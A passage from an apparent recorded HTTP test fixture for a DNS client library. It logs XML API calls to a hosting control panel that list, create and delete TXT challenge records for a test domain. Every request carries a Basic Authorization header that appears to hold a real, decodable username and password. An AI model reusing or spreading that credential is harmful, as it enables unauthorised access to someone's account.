Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['173']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <site>\n <get>\n <result>\n \
\ <status>ok</status>\n <filter-id>lexicon-test.com</filter-id>\n\
\ <id>71</id>\n <data/>\n </result>\n </get>\n </site>\n\
</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['259']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:42 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:42 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:42 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<get_rec>\n\t\t\t<filter>\n\t\t\t\t<site-id>71</site-id>\n\t\t\t\
</filter>\n\t\t</get_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['148']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <get_rec>\n <result>\n \
\ <status>ok</status>\n <id>4836</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>ipv4.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4837</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>lexicon-test.com.</host>\n <value>v=spf1 +a +mx\
\ -all</value>\n <opt/>\n </data>\n </result>\n \
\ <result>\n <status>ok</status>\n <id>4838</id>\n <data>\n\
\ <site-id>71</site-id>\n <type>PTR</type>\n <host>83.169.2.56</host>\n\
\ <value>lexicon-test.com.</value>\n <opt>24</opt>\n \
\ </data>\n </result>\n <result>\n <status>ok</status>\n\
\ <id>4839</id>\n <data>\n <site-id>71</site-id>\n\
\ <type>CNAME</type>\n <host>ftp.lexicon-test.com.</host>\n\
\ <value>lexicon-test.com.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4840</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>www.lexicon-test.com.</host>\n <value>lexicon-test.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4841</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>mail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4842</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>MX</type>\n\
\ <host>lexicon-test.com.</host>\n <value>mail.lexicon-test.com.</value>\n\
\ <opt>10</opt>\n </data>\n </result>\n <result>\n\
\ <status>ok</status>\n <id>4843</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>webmail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4844</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>lexicon-test.com.</host>\n <value>83.169.2.56</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4845</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>NS</type>\n <host>lexicon-test.com.</host>\n\
\ <value>ns2.quasispace.de.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4846</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>NS</type>\n\
\ <host>lexicon-test.com.</host>\n <value>ns2.hans.hosteurope.de.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4847</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>localhost.lexicon-test.com.</host>\n\
\ <value>127.0.0.1</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4848</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>docs.lexicon-test.com.</host>\n <value>docs.example.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4849</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>_acme-challenge.fqdn.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4850</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.full.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4851</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.test.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4852</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4853</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4854</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.noop.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4860</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.deleterecordinset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4863</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4864</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4865</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.fqdntest.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4866</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>random.fulltest.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4867</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.test.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4869</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.test.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4872</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>updated.testfqdn.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4874</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.testfull.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4890</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>localhot.lexicon-test.com.</host>\n <value>127.0.0.1</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4918</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>orig.nameonly.test.lexicon-test.com.</host>\n\
\ <value>updated</value>\n <opt/>\n </data>\n \
\ </result>\n </get_rec>\n </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['8606']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:42 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:42 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:42 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<add_rec>\n\t\t\t<site-id>71</site-id>\n\t\t\t<type>TXT</type>\n\
\t\t\t<host>delete.testfull</host>\n\t\t\t<value>challengetoken</value>\n\t\t\
\t<opt></opt>\n\t\t</add_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['222']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <add_rec>\n <result>\n \
\ <status>ok</status>\n <id>4921</id>\n </result>\n </add_rec>\n\
\ </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['203']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:43 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:42 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:42 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<get_rec>\n\t\t\t<filter>\n\t\t\t\t<site-id>71</site-id>\n\t\t\t\
</filter>\n\t\t</get_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['148']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <get_rec>\n <result>\n \
\ <status>ok</status>\n <id>4836</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>ipv4.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4837</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>lexicon-test.com.</host>\n <value>v=spf1 +a +mx\
\ -all</value>\n <opt/>\n </data>\n </result>\n \
\ <result>\n <status>ok</status>\n <id>4838</id>\n <data>\n\
\ <site-id>71</site-id>\n <type>PTR</type>\n <host>83.169.2.56</host>\n\
\ <value>lexicon-test.com.</value>\n <opt>24</opt>\n \
\ </data>\n </result>\n <result>\n <status>ok</status>\n\
\ <id>4839</id>\n <data>\n <site-id>71</site-id>\n\
\ <type>CNAME</type>\n <host>ftp.lexicon-test.com.</host>\n\
\ <value>lexicon-test.com.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4840</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>www.lexicon-test.com.</host>\n <value>lexicon-test.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4841</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>mail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4842</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>MX</type>\n\
\ <host>lexicon-test.com.</host>\n <value>mail.lexicon-test.com.</value>\n\
\ <opt>10</opt>\n </data>\n </result>\n <result>\n\
\ <status>ok</status>\n <id>4843</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>webmail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4844</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>lexicon-test.com.</host>\n <value>83.169.2.56</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4845</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>NS</type>\n <host>lexicon-test.com.</host>\n\
\ <value>ns2.quasispace.de.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4846</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>NS</type>\n\
\ <host>lexicon-test.com.</host>\n <value>ns2.hans.hosteurope.de.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4847</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>localhost.lexicon-test.com.</host>\n\
\ <value>127.0.0.1</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4848</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>docs.lexicon-test.com.</host>\n <value>docs.example.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4849</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>_acme-challenge.fqdn.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4850</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.full.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4851</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.test.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4852</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4853</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4854</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.noop.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4860</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.deleterecordinset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4863</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4864</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4865</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.fqdntest.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4866</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>random.fulltest.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4867</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.test.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4869</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.test.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4872</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>updated.testfqdn.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4874</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.testfull.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4890</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>localhot.lexicon-test.com.</host>\n <value>127.0.0.1</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4918</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>orig.nameonly.test.lexicon-test.com.</host>\n\
\ <value>updated</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4921</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>delete.testfull.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n </get_rec>\n </dns>\n\
</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['8891']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:43 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:43 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:43 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<del_rec>\n\t\t\t<filter>\n\t\t\t\t<id>4921</id>\n\t\t\t</filter>\n\
\t\t</del_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['140']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <del_rec>\n <result>\n \
\ <status>ok</status>\n <id>4921</id>\n </result>\n </del_rec>\n\
\ </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['203']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:43 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:43 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:43 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<get_rec>\n\t\t\t<filter>\n\t\t\t\t<site-id>71</site-id>\n\t\t\t\
</filter>\n\t\t</get_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['148']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <get_rec>\n <result>\n \
\ <status>ok</status>\n <id>4836</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>ipv4.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4837</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>lexicon-test.com.</host>\n <value>v=spf1 +a +mx\
\ -all</value>\n <opt/>\n </data>\n </result>\n \
\ <result>\n <status>ok</status>\n <id>4838</id>\n <data>\n\
\ <site-id>71</site-id>\n <type>PTR</type>\n <host>83.169.2.56</host>\n\
\ <value>lexicon-test.com.</value>\n <opt>24</opt>\n \
\ </data>\n </result>\n <result>\n <status>ok</status>\n\
\ <id>4839</id>\n <data>\n <site-id>71</site-id>\n\
\ <type>CNAME</type>\n <host>ftp.lexicon-test.com.</host>\n\
\ <value>lexicon-test.com.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4840</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>www.lexicon-test.com.</host>\n <value>lexicon-test.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4841</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>mail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4842</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>MX</type>\n\
\ <host>lexicon-test.com.</host>\n <value>mail.lexicon-test.com.</value>\n\
\ <opt>10</opt>\n </data>\n </result>\n <result>\n\
\ <status>ok</status>\n <id>4843</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>webmail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4844</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>lexicon-test.com.</host>\n <value>83.169.2.56</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4845</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>NS</type>\n <host>lexicon-test.com.</host>\n\
\ <value>ns2.quasispace.de.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4846</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>NS</type>\n\
\ <host>lexicon-test.com.</host>\n <value>ns2.hans.hosteurope.de.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4847</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>localhost.lexicon-test.com.</host>\n\
\ <value>127.0.0.1</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4848</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>docs.lexicon-test.com.</host>\n <value>docs.example.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4849</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>_acme-challenge.fqdn.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4850</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.full.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4851</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.test.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4852</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4853</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4854</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.noop.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4860</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.deleterecordinset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4863</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4864</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4865</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.fqdntest.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4866</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>random.fulltest.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4867</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.test.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4869</id>\n <data>\n \
